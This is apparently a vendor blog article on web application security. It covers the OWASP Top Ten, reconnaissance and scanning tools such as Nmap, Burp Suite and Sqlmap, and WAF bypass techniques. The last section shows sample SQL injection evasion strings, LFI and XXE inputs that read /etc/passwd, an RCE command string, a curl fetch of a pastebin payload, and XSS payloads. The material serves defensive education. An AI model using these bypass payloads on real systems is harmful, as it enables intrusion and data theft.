(in)Secure web: find vulnerabilities before an attacker

Securing web applications (websites, online stores, personal accounts) and APIs is not as easy as it might seem at first glance. There are several reasons for this:

• web applications are available 24/7, and an attacker can launch an attack at any time;
• web applications are a stack of different technologies, the interaction of which is sometimes difficult to implement;
• web applications are often self-written and, unfortunately, this does not make them more secure;
• web applications are initially developed to improve the company’s image and obtain economic benefits, and their security is not the first thing to think about;
• thanks to the web application, you can get a variety of valuable information, from user data to the best practices of the owner company.

Of course, web developers try to prevent the emergence of vulnerabilities, but for the reasons described earlier, it is not always possible to avoid this, and sometimes even fix it the first time. To understand the current types of web application vulnerabilities, it is enough to turn to one of the most authoritative web security projects – OWASP. Among other things, the resource contains a list of the most dangerous and relevant vulnerabilities of web applications called OWASP Top Ten:

A1 – Injections;
A2 – Lack of Authentication;
A3 – Disclosure of confidential data;
A4 – XML ​​External Entities (XXE);
A5 – Disadvantages of access control;
A6 – Incorrect setting of security parameters;
A7 – Cross-site scripting (XSS);
A8 – Insecure deserialization;
A9 – Use of components with known vulnerabilities;
A10 – Disadvantages of Logging and Monitoring.

Typically, the security of a web application consists of:

• penetration testing;
• analysis of source code for vulnerabilities;
• use of monitoring and threat detection systems: WAF, SIEM;
• audit of the web server and web environment.

Using various testing tools will allow a developer to independently analyze a web application, detect and fix vulnerabilities before an attacker finds and exploits them. To do this, you can use special distributions that have the necessary set of tools and are designed to conduct penetration testing. One such distribution is Kali Linux. But if the tool you are interested in was not found, then you can use the truly bottomless resource Github. Nevertheless, the Kali Linux toolkit is mostly sufficient for most of the needs of a penetration testing.

For informational purposes only. Do not break the law!

Recoinanse

Nmap

First of all, you need to understand what other network services are available at the address where the web application is located. To do this, let’s scan with Nmap:# nmap -v 192.168.x.x.

Nmap has quite a few scanning features that can be combined, for example:

• scan TCP and UDP ports;
• define services;
• collect banners and more.

If you find open ports, you need to check the services and try to collect as much information about them as possible by adding the -sV switch:
# nmap -v 192.168.x.x -sV.

The tool also supports a huge number of scripts written in the Lua language, which will help automate the collection of information about the purpose of testing. Under certain conditions, Nmap can be used as a means of elevating privileges on a system.

Dirb/Dirbuster

These instruments are very similar to each other not only in name. They both allow you to recursively traverse a target site looking for directories and files that you don’t want to find. The work of the tools is based on enumerating query options using the dictionary and analyzing the response from the web server, on the basis of which it is concluded that a file / directory is present. Dirbuster differs from its counterpart in the presence of a graphical interface and the ability to conduct a “clean” bruteforce attack on directories and files, but this function is quite resource-intensive.

Search for vulnerabilities and flaws

Burp Suite (Community Edition)

Refers to the type of intercepting proxy. The main task of this feature-rich platform is to intercept requests from the browser to the web application to parse the request, edit it and send it to the destination. You can intercept requests on the fly, modify them and send them to the server using the Repeater module, analyzing the response of the web application.

OWASP Zap

A software package for automating the search and exploitation of vulnerabilities. Completely free Burp Suite with no restrictions. The functionality of these tools is quite similar. OWASP Zap’s Active Scanning engine allows you to recursively traverse an entire site, substituting payload for whatever parameters it can find. Burp Suite has a similar module called Intruder, but it requires manually specifying the parameters to work with. The program interface has been translated into Russian, which will be convenient for many users. The work area is divided into 2 parts. At the bottom there are tabs with current tasks and the process of their execution, at the top there is a tree of sites that the user visits and an additional window for sending requests and receiving responses, as in the Repeater module in Burp Suite. Each component in the program settings has many customizable parameters. For example, we can set up incoming vectors for active crawling, generate dynamic SSL certificates, add HTTP session IDs, etc.

Wapiti

A free console web application vulnerability scanner that can work with the following types of vulnerabilities:

• file expansion (local and remote, fopen, readfile);
• injection (PHP / JSP / ASP / SQL injection and XPath injection);
• XSS (Cross Site Scripting);
• XXE (XML External Entity) embedding;
• SSRF (Server Side Request Forgery);
• use of known potentially dangerous files (thanks to the Nikto database);
• Shellshock;
• open redirects, etc.

The tool works on the principle of BlackBox testing (not the source code of the application is analyzed, but the server’s responses to requests with changed parameters). The utility first analyzes the site structure, searches for available scripts, analyzes the parameters, and then turns on its own fuzzer for testing. At the end of the scan, a report is generated that lists the vulnerabilities found, grouped by their type. You can read more about Wapiti in the article Checking a website for vulnerabilities on your own using Wapiti

Acunetix Web Vulnerability Scanner ($$$)

Automates the task of monitoring the security of web applications and allows you to identify vulnerabilities in their protection before an attacker finds and exploits them. First, the program examines and forms the structure of the site, processing all found links and collecting information about all found files. Then he proceeds to test all parameters of the web application, simulating data input using a fuzzer, using substitutions of various parameters and snippets that can help detect a security hole. Among the vulnerabilities available for detection are all types of SQL injection, Cross Site Scripting, CRLF injection and much more.

Exploitation

Sqlmap

Designed to automate the search and operation of SQL injection. Allows you to search for all kinds of SQL injection, working with both GET and POST requests. And if you need to process the entire request, you can save it to a file and transfer it to SQLmap in this format, specifying the parameter required for verification. When searching for and exploiting vulnerabilities, the script takes into account the specifics of the databases being investigated, be it MySQL, Oracle, PostgreSQL or Microsoft SQL Server.

XSStrike

XSStrike is an XSS vulnerability detection package equipped with four handwritten parsers, an intelligent payload generator, powerful fuzzing engine, and a fast scanner. It recognizes the response using multiple parsers, and then processes payloads that are guaranteed to work with context analysis integrated into the fuzzing engine. The tool supports:

• context cracking technology;
• intelligent generation of payloads;
• support for GET & POST methods;
• support for cookies;
• WAF detection;
• handmade payloads for filtering and WAF evasion;
• hidden parameter discovery.

Web Application Firewall and Bypass Techniques

Web Application Firewall (WAF) is a software package designed to detect and block attacks on a web application. Used as a superimposed remedy. This means that it sits in front of the main web application and analyzes inbound and outbound traffic. In real time, it makes a decision to grant or deny access to the web application. Of course, a web application can be protected by the developers of the application itself without using WAF. But this requires additional costs, for example, the maintenance of the information security department.

Looking ahead, it should be said that the shortcomings of query filtering are characteristic of signature analysis. Combined analysis based on signatures and machine learning allows you to identify, among other things, various techniques for bypassing WAF. You can read about common errors and vulnerabilities that lead to the compromise of web resources in the article Hack an online store in 60 seconds.

For an improved monitoring system, WAFs are combined with other security components such as network IPS / IDS, incident management systems (SIEM), anti-fraud services, etc. Despite the high speed of operation, using only signature analysis in WAF allows attackers to bypass filtering, for example:

SQLi:

q=` union/**/select+1,2,3,4 — -
q=` uni%0bon+se%0blect+1,2,3,4 — -
q=` UNunionION+SEselectLECT+1,2,3,4 — -

In the first example, by replacing spaces between words, the entire expression will be perceived as one whole, but the web application itself will treat comments (/**/) and + as separating characters between words and perceived as spaces. Or you can split the request using URL-Encode, as in the second example. The third example shows that web applications and even WAF can use keyword filtering, and this example can help you bypass it. In this example, the protectors will filter keywords from the query, such as union and select, but the query will eventually be processed by the web application as: q=` UNION+SELECT+1,2,3,4 — -

LFI:

q=../e?c/pa??wd

Keyword searches also allow attackers to bypass filtering in the case of LFI. Try running the # cat /e?C/pa??wd command in the console and you might be surprised at the result.

RFI:

… curl -s http://pastebin.com/raw/... -o …

The pastebin.com resource is a pretty convenient way to share some of your notes and ideas, but it can be used by attackers to deliver a payload to a web server if the application supports downloading data from external sources.

RCE:

q=;system(`cat%20/etc/passwd`)

Here is a typical request with the execution of the system command: # cat /etc/passwd, the execution of which is possible due to the presence of an RCE vulnerability in a web application that allows executing commands on the server.

XXE:

<!ENTITY sp SYSTEM «file:///etc/passwd»> ]>

A web application’s use of XML can lead to the injection of external XML entities, which would allow an attacker not only to read local files on the server, but also inject their own malicious code using a remote server.

XSS:

<A/+/onmouseover+=+(confirm)()>alert
<img onerror=a lert(1) src=a>

One of the most dangerous vulnerabilities that is often underestimated. Just one stored XSS on a site can allow an attacker to receive cookies from all users who visit the infected page.

JSON:

`»><script>alert(context)</script>

The same as the previous option, only using JSON.

Use the Nemesida WAF, stay healthy and protected!